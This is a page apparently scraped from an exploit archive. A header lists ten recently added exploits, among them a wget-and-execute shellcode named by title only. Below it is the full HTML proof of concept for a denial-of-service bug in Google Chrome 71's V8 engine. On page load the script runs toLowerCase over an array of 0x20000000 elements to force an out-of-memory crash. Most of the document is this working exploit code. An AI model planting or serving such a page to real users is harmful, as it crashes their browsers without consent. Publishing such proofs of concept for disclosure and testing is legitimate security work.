
10 changes to exploits/shellcodes Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory. Denial of Service (PoC) Microsoft Office SharePoint Server 2016 - Denial of Service (Metasploit) polkit - Temporary auth Hijacking via PID Reuse and Non-atomic Fork Microsoft Windows - Windows Error Reporting Local Privilege Escalation Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion MDwiki < 0.6.2 - Cross-Site Scripting Heatmiser Wifi Thermostat 1.7 - Cross-Site Request Forgery (Update Admin) ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting BlogEngine 3.3 - XML External Entity Injection Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)
34 lines
No EOL
845 B
HTML
34 lines
No EOL
845 B
HTML
<!--
|
|
# Exploit Title: Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory. Denial of Service (PoC)
|
|
# Google Dork: N/A
|
|
# Date: 2018-12-23
|
|
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
|
|
# Vendor Homepage: https://www.google.com/
|
|
# Version: Google Chrome 71.0.3578.98, V8 version 7.3.0 (candidate)
|
|
# Tested on: Windows x64
|
|
# CVE : N/A
|
|
|
|
# Description:
|
|
|
|
# Fatal javascript OOM in CALL_AND_RETRY_LAST
|
|
|
|
# https://bugs.chromium.org/p/chromium/issues/detail?id=917631
|
|
-->
|
|
|
|
<html>
|
|
<head>
|
|
<script>
|
|
|
|
function main() {
|
|
|
|
var vArr = new Array();
|
|
var bigArray = new Array(0x20000000);
|
|
vArr[0] = String.prototype.toLowerCase.call(bigArray);
|
|
vArr[1] = String.prototype.toLowerCase.call(bigArray);
|
|
vArr[2] = String.prototype.toLowerCase.call(bigArray);
|
|
|
|
}
|
|
</script>
|
|
</head>
|
|
<body onload=main()></body>
|
|
</html> |